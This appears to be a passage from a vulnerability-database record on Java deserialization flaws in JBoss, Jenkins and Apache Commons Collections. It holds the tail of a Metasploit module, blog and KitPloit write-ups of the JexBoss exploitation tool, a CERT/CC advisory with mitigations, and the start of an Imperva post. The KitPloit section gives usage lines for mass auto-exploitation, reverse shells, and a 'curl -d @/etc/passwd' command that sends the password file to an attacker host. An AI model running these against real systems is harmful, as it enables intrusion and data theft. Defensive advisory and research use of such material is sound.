chained_transformer = lazy_map.class_data[0]\n chained_transformer.class_data[0]\n end\n\n def read_bin_file(bin_file_path)\n data = ''\n\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", bin_file_path ), 'rb') do |f|\n data = f.read\n end\n\n data\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/jenkins_java_deserialize.rb"}], "pentestit": [{"lastseen": "2017-08-11T08:07:48", "bulletinFamily": "blog", "description": "PenTestIT RSS Feed\n\nI was working with a customers Red Hat JBoss server today and wanted to test for affected deserialization vulnerabilities. Though my favourite go-to tool - the Burp Suite has many extensions, I wanted to try something that I had not before. That's when I stumbled across **JexBoss**, which turned out to be a pretty decent [open source](<http://pentestit.com/tag/open-source/>) tool. I think _JexBoss_ is a play on Java EXploitation like a Boss wording.\n\n![JexBoss](http://pentestit.com/wp-content/uploads/2017/08/JexBoss.png)\n\n## What is JexBoss?\n\nJexBoss is an open source tool in Python to help you exploit and verify Java and Red Hat JBoss deserialization vulnerabilities. As we all know, serialization converts and objects state to a byte stream so that a copy of the same object can be obtained by reverting the byte stream itself. Presumably, to deserialize is to reverse serialization, ie. taking the serialized data to rebuild it into the original object. This problem is trivial in Java as there are no checks on the classes that can be deserialized.\n\n## Features of JexBoss:\n\nThe tool and exploits were developed and tested for:\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), DNS gadget, Remote JMX (CVE-2016-3427, CVE-2016-8735), Apache Struts2 Jakarta Multipart parser CVE-2017-5638, etc.)\n * Supported exploitation vectors are: \n * /_admin-console_: Tested and working in JBoss versions 5 and 6.\n * /_jmx-console_: Tested and working in JBoss versions 4, 5 and 6.\n * /_jmx-console_/_HtmlAdaptor_: Tested and working in JBoss versions 4, 5 and 6.\n * /_web-console_/_Invoker_: Tested and working in JBoss versions 4, 5 and 6.\n * /_invoker_/_JMXInvokerServlet_: Tested and working in JBoss versions 4, 5 and 6.\n * Application Deserialization: Tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters.\n * Servlet Deserialization: Tested and working against multiple java applications, platforms, etc, via servlets that process serialized objects.\n * Apache Struts2 Jakarta Multipart ([CVE-2017-5638](<http://pentestit.com/tag/CVE-2017-5638/>)): Tested against Apache Struts 2 applications.\n * Tries to authenticate to /_admin-console_/_login.seam_ using default user name and password - admin:admin.\n * Sends exploits with proper headers alternating with random User-Agent string.\n * Proxy support.\n * Auto scan and file scan modes.\n\nWith the auto scan and file scan modes, you can leverage this tool to launch a mass-scan against your own network in a short duration of time. Additionally, a payload also allows you to gain access to a reverse shell with Metasploit meterpreter support. Another good news is that it JexBoss is Python 2 & Python 3 compatible. It also includes an auto-updater.\n\n## Download JexBoss:\n\nAs always, the current version - JexBoss version 1.2.4 - can be obtained by checking out the GIT repository from [**here**](<https://github.com/joaomatosf/jexboss>).\n\nThe post [JexBoss: Java Deserialization Verification & EXploitation Tool!](<http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2017-08-11T06:52:45", "published": "2017-08-11T06:52:45", "id": "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "href": "http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/", "title": "JexBoss: Java Deserialization Verification & EXploitation Tool!", "type": "pentestit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2019-12-02T07:42:12", "bulletinFamily": "tools", "description": "JexBoss is a tool for testing and exploiting [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc. \n \n** Requirements ** \n\n\n * Python >= 2.7.x \n * [ urllib3 ](<https://pypi.python.org/pypi/urllib3>)\n * [ ipaddress ](<https://pypi.python.org/pypi/ipaddress>)\n \n** Installation on Linux\\Mac ** \nTo install the latest version of JexBoss, please use the following commands: \n\n \n \n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n OR:\n \n Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n unzip master.zip\n cd jexboss-master\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n\nIf you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl: \n\n \n \n yum -y install centos-release-scl\n yum -y install python27\n scl enable python27 bash\n\n \n** Installation on Windows ** \nIf you are using Windows, you can use the [ Git Bash ](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) to run the JexBoss. Follow the steps below: \n\n\n * Download and install [ Python ](<https://www.python.org/downloads/release/python-2712/>)\n * Download and install [ Git for Windows ](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>)\n * After installing, run the Git for Windows and type the following commands: \n \n \n PATH=$PATH:C:\\Python27\\\n PATH=$PATH:C:\\Python27\\Scripts\n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n\n \n** Features ** \nThe tool and [ exploits ](<https://www.kitploit.com/search/label/Exploits>) were developed and tested for: \n\n\n * JBoss Application Server versions: 3, 4, 5 and 6. \n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc) \nThe exploitation vectors are: \n\n\n * /admin-console \n * tested and working in JBoss versions 5 and 6 \n * /jmx-console \n * tested and working in JBoss versions 4, 5 and 6 \n * /web-console/Invoker \n * tested and working in JBoss versions 4, 5 and 6 \n * /invoker/JMXInvokerServlet \n * tested and working in JBoss versions 4, 5 and 6 \n * Application Deserialization \n * tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters \n * Servlet Deserialization \n * tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an \"Invoker\" in a link) \n * Apache Struts2 CVE-2017-5638 \n * tested in [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 applications \n * Others \n \n** Videos ** \n\n\n * Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss \n\n \n\n\n * Exploiting JBoss Application Server with JexBoss \n\n \n\n\n * Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638) \n\n \n \n** Screenshots ** \n\n\n * Simple usage examples: \n \n \n $ python jexboss.py\n\n \n\n\n[ ![](https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s640/jexboss_4_simple_usage_help.png) ](<https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png>)\n\n \n\n\n * Example of standalone mode against JBoss: \n \n \n $ python jexboss.py -u http://192.168.0.26:8080\n\n \n\n\n[ ![](https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s640/jexboss_5_standalone_mode1.png) ](<https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png>)\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s640/jexboss_6_standalone_mode2.png) ](<https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png>)\n\n * Usage modes: \n \n \n $ python jexboss.py -h\n\n * Network scan mode: \n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s640/jexboss_7_network_scan_mode.png) ](<https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png>)\n\n \n\n\n * Network scan with auto-exploit mode: \n \n \n $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s640/jexboss_8_scan_with_auto_exploit_mode.png) ](<https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png>)\n\n \n\n\n * Results and recommendations: \n\n[ ![](https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s640/jexboss_9_results_and_recommendations2.png) ](<https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png>)\n\n \n \n** Reverse Shell (meterpreter integration) ** \nAfter you exploit a JBoss server, you can use the own [ jexboss ](<https://www.kitploit.com/search/label/JexBoss>) command shell or perform a reverse connection using the following command: \n\n \n \n jexremote=YOUR_IP:YOUR_PORT\n \n Example:\n Shell>jexremote=192.168.0.10:4444\n\n * Example: [ ](<https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg>)\n\n[ ![](https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s640/jexboss_10_jexbossreverse2.jpeg) ](<https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s1600/jexboss_10_jexbossreverse2.jpeg>)\n\n \n\n\nWhen exploiting java deserialization [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. \n \n** Usage examples ** \n\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server: \n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl [email\u00a0protected]/etc/passwd http://your_server'\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host): \n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n\n * For Java Deserialization Vulnerabilities in a Servlet (like Invoker): \n \n \n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n\n * For [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) \n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n\n * For [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) with [ cookies ](<https://www.kitploit.com/search/label/Cookies>) for authenticated resources \n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n\n * Auto scan mode: \n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n\n * File scan mode: \n \n \n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n\n * More Options: \n \n \n optional arguments:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE\n PERMISSION!!!)\n --disable-check-updates, -D\n Disable two updates checks: 1) Check for updates\n performed by the webshell in exploited server at\n http://webshell.jexboss.net/jsp_version.txt and 2)\n check for updates performed by the jexboss client at\n http://joaomatosf.com/rnp/releases.txt\n -mode {standalone,auto-scan,file-scan}\n Operation mode (DEFAULT: standalone)\n --app-unserialize, -j\n Check for java unserialization vulnerabilities in HTTP\n parameters (eg. javax.faces.ViewState, oldFormData,\n etc)\n --servlet-unserialize, -l\n Check for java unserialization vulnerabilities in\n Servlets (like Invoker interfaces)\n --jboss Check only for JBOSS vectors.\n --jenkins Check only for Jenkins CLI vector.\n --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat\n (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n checked by default.\n --proxy PROXY, -P PROXY\n Use a http proxy to connect to the target URL (eg. -P\n http://192.168.0.1:3128)\n --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n Proxy authentication credentials (eg -L name:password)\n --jboss-login LOGIN:PASS, -J LOGIN:PASS\n JBoss login and password for exploit admin-console in\n JBoss 5 and JBoss 6 (default: admin:admin)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 3)\n \n Standalone mode:\n -host HOST, -u HOST Host address to be checked (eg. -u\n http://192.168.0.10:8080)\n \n Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n --reverse-host RHOST:RPORT, -r RHOST:RPORT\n Remote host address and port for reverse shell when\n exploiting Java Deserialization Vulnerabilities in\n application layer (for now, working only against *nix\n systems)(eg. 192.168.0.10:1331)\n --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d\n @/etc/passwd http://your_server)\n --windows, -w Specifies that the commands are for rWINDOWS System$\n (cmd.exe)\n --post-parameter PARAMETER, -H PARAMETER\n Specify the parameter to find and inject serialized\n objects into it. (egs. -H javax.faces.ViewState or -H\n oldFormData (<- Hi PayPal =X) or others) (DEFAULT:\n javax.faces.ViewState)\n --show-payload, -t Print the generated payload.\n --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n Specify the type of Gadget to generate the payload\n automatically. (DEFAULT: commons-collections3.1 or\n groovy1 for JenKins)\n --load-gadget FILENAME\n Provide your own gadget from file (a java serialized\n object in RAW mode)\n --force, -F Force send java serialized gadgets to URL informed in\n -u parameter. This will send the payload in multiple\n formats (eg. RAW, GZIPED and BASE64) and with\n different Content-Types.\n \n Auto scan mode:\n -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)\n -ports PORTS List of ports separated by commas to be checked for\n each host (eg. 8080,8443,8888,80,443)\n -results FILENAME File name to store the auto scan results\n \n File scan mode:\n -file FILENAME_HOSTS Filename with host list to be scanned (one host per\n line)\n -out FILENAME_RESULTS\n File name to store the file scan results\n \n\n \n \n\n\n** [ Download JexBoss ](<https://github.com/joaomatosf/jexboss>) **\n", "modified": "2017-12-18T21:14:35", "published": "2017-12-18T21:14:35", "id": "KITPLOIT:5230099254245458698", "href": "http://www.kitploit.com/2017/12/jexboss-jboss-and-others-java.html", "title": "JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:48:59", "bulletinFamily": "info", "description": "### Overview \n\nThe Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Java applications that either directly use ACC, or contain ACC in their classpath, may be vulnerable to arbitrary code execution.\n\n### Description \n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data - **CVE-2015-6420\n\nIn January 2015, at AppSec California 2015, researchers [Gabriel Lawrence and Chris Frohoff](<http://frohoff.github.io/appseccali-marshalling-pickles/>) described how many Java applications and libraries using Java Object Serialization may be vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Any Java library or application that utilizes this functionality incorrectly may be impacted by this vulnerability. \n \nIn November 2015, [Stephen Breen of Foxglove Security](<http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>) identified the [Apache Commons Collections](<https://commons.apache.org/proper/commons-collections/>) (ACC) Java library as being vulnerable to insecure deserialization of data; specifically, the ACC `InvokerTransformer` class may allow arbitrary code execution when used to deserialize data from untrusted sources. According to the researcher, this issue affects several large projects that utilize ACC including WebSphere, JBoss, [Jenkins](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>), [WebLogic](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179>), and OpenNMS. Unify also reports that [OpenScape](<https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>) software is affected. In addition, [Cisco](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20>) has released an advisory for their products. \n \nBoth [versions 3.2.1 and 4.0](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) of the Apache Commons Collections library have been identified as being vulnerable to this deserialization issue. \n \nThe Apache Software Foundation has released a [statement](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) regarding this issue, which contains advice for mitigating the issue, as well as further references and links. A [bug](<https://issues.apache.org/jira/browse/COLLECTIONS-580>) tracker entry has been filed to track progress toward a full solution. \n \nOther libraries, such as Groovy and Spring, are currently being investigated for similar flaws. Lawrence and Frohoff's presentation describes how applications and libraries written in other languages, such as Python and Ruby, may also be vulnerable to the same type of issue. It is generally up to software designers to follow best practices for security when handling serialized data, no matter the programming language or library used. \n \n--- \n \n### Impact \n\nA Java application or library with the Apache Commons Collections library in its classpath may be coerced into executing arbitrary Java functions or bytecode. \n \nWhile many applications do not actively use serialization or deserailization, they often rely on libraries that do. If a class uses deserialization on some input stream (either a file or socket), and an attacker can send malicious data down that stream, the attacker can cause the program to construct objects of any class on its classpath (whether it uses those classes or not). And some classes, such as those in the ACC automatically execute code based on attacker-supplied deserialization input. \n \nAn application that neither uses deserialization, nor employs any libraries that use deserialization, would not be vulnerable to this problem. Such an application should also lack a plugin architecture, or any mechanism for loading code that might use deserialization. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of a full solution to this problem, but you may consider the following: \n \n**Apply an update** \n \nApache Commons Collections [version 3.2.2](<https://commons.apache.org/proper/commons-collections/download_collections.cgi>) and [version 4.1](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) has been released. These new releases mitigate the vulnerability by disabling the insecure functionality. \n \n**Developers need to re-architect their applications, and should be suspicious of deserialized data from untrusted sources** \n \nDevelopers will need to make further architectural changes to secure their applications before they can re-enable functionality in ACC version 3.2.2 and later. From Apache's statement: \n \n_However, to be clear: this is not the only known and especially not unknown useable gadget. So replacing your installations with a hardened version of Apache Commons Collections will not make your application resist this vulnerability. _ \n \nDevelopers should in general be very suspicious of deserialized data from an untrusted source. For best practices, see the [CERT Oracle Coding Standard for Java](<https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>) guidelines for Serialization, especially rules [SER12-J](<https://www.securecoding.cert.org/confluence/display/java/SER12-J.+Prevent+deserialization+of+untrusted+classes>) and [SER13-J](<https://www.securecoding.cert.org/confluence/display/java/SER13-J.+Treat+data+to+be+deserialized+as+potentially+malicious+by+default>). \n \n**Use firewall rules or filesystem restrictions** \n \nSystem administrators may be able to mitigate this issue for some applications by restricting access to the network and/or filesystem. If an affected application, such as Jenkins, utilizes an open port accepting serialized objects, restricting access to the application may help mitigate the issue. \n \n--- \n \n### Vendor Information\n\n576313\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apache Software Foundation\n\nUpdated: November 10, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Cisco\n\nUpdated: July 18, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nCisco has released a [security advisory](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>) and list of affected products at the URL below. Cisco has assigned CVE-2015-6420 to this issue.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n\n### Addendum\n\nAs of 2017-07-18, CERT/CC is aware of a report that Cisco Unity Express (CUE) 8.6.1 is still vulnerable to this issue and is incorrectly identified as \"not vulnerable\" in the above Cisco advisory. We have reached out to Cisco for clarification.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23576313 Feedback>).\n\n### __ __ IBM Corporation\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nIBM has released a security advisory for WebSphere at the following URL:\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n### __ __ Jenkins\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nJenkins has released a security advisory at the URL below. CVE-2015-8103 was assigned this issue in Jenkins.\n\n### Vendor References\n\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n\n### __ __ Oracle Corporation\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOracle has released a security advisory at the URL below:\n\n### Vendor References\n\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179\n>)\n * <https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852>\n\n### __ __ Unify Inc\n\nUpdated: November 30, 2015 \n\n**Statement Date: November 24, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"Unify is affected in two product lines as listed below. For details refer to the information given in the Security Advisory OBSO-1511-01.\n\nWe recommend all customers to apply the mitigations described in the advisory and install the corresponding product fix releases as soon as available. \nTo get notified about Advisory updates, subscribe as listed in `<https://www.unify.com/security/advisories>`.\"\n\n### Vendor Information\n\nUnify has issued Security Advisory OBSO-1511-01 at the URL listed below. \n \nMitre had assigned two CVE IDs for Unify products impacted by VU#576313: \n \nCVE-2015-8237, affected products: \nUnify OpenScape Fault Management V7 (\"cpe:/a:unify:openscape_fault_management:7.%02\") \nUnify OpenScape Fault Management V8 (\"cpe:/a:unify:openscape_fault_management:8.%02\") \n \nCVE-2015-8238, affected products: \nUnify OpenScape UC Application V7 (\"cpe:/a:unify:openscape_uc_application:7.%02\") \nUnify OpenScape Common Management Platform V7 (\"cpe:/a:unify:openscape_common_management_platform:7.%02\")\n\n### Vendor References\n\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n\n### __ __ Red Hat, Inc.\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nJBOSS has been reported as being affected.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.4 | E:POC/RL:W/RC:C \nEnvironmental | 6.4 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>\n * <https://issues.apache.org/jira/browse/COLLECTIONS-580>\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 >)\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n * <http://www.openwall.com/lists/oss-security/2015/11/11/3>\n * <http://www.infoq.com/news/2015/11/commons-exploit>\n * <https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-serialization/>\n * <http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>\n * <http://mail-archives.apache.org/mod_mbox/commons-dev/201511.mbox/%3c20151106222553.00002c57.ecki@zusammenkunft.net%3e>\n * <http://frohoff.github.io/appseccali-marshalling-pickles/>\n * <http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles>\n * <https://www.youtube.com/watch?v=VviY3O-euVQ>\n * <https://commons.apache.org/proper/commons-collections/>\n * <http://cwe.mitre.org/data/definitions/502.html>\n * <https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>\n * <http://www.oracle.com/technetwork/java/seccodeguide-139067.html#8>\n\n### Acknowledgements\n\nThis type of vulnerability was reported publicly by Gabriel Lawrence and Chris Frohoff, and later investigated by Stephen Breen.\n\nThis document was written by Garret Wassermann with assistance from David Svoboda and the CERT Secure Coding team.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-6420](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6420>) \n---|--- \n**Date Public:** | 2015-01-28 \n**Date First Published:** | 2015-11-13 \n**Date Last Updated: ** | 2018-08-27 17:57 UTC \n**Document Revision: ** | 88 \n", "modified": "2018-08-27T17:57:00", "published": "2015-11-13T00:00:00", "id": "VU:576313", "href": "https://www.kb.cert.org/vuls/id/576313", "type": "cert", "title": "Apache Commons Collections Java library insecurely deserializes data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "bulletinFamily": "blog", "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs 